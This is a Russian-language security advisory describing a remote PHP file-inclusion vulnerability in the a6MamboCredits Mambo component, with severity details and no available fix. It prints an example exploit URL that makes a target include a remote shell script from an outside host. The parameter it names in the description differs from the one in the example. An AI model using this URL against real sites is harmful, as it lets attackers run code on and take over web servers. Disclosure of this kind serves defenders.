PHP-инклюдинг в Mambo a6MamboCredits

Дата публикации:
21.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
4560
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
a6MamboCredits 2.x (компонент к Mambo)
a6MamboCredits 1.x (компонент к Mambo)
Уязвимые версии: a6MamboCredits (компонент Mambo) 2.0.0 и другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_ a6mambocredits/admin.a6mambocredits.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://www.targer.com/administrator/components/com_ a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= http://Senjata.com/tembuspakeshell.txt

URL производителя: mambo.active6.com/index.php...Itemid=64

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Mambo a6mambocredits Component 1.0.0 File Include Vulnerability

или введите имя

CAPTCHA